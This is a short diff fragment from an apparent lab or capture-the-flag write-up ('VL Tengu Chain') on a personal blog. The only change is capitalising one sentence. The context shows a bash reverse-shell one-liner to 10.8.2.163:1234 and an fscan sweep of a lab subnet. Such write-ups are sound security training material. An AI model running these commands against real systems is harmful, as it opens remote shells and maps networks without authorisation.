ethicxz/ethicxz.github.io/_posts/2024-08-26-VL Tengu Chain.md

 > bash -c 'bash -i >& /dev/tcp/10.8.2.163/1234 0>&1'
 ```
-now let's do a scan with fscan to see what's running on the machine :
+Now let's do a scan with fscan to see what's running on the machine :

 ```bash
 ./fscan -h 10.10.208.0/24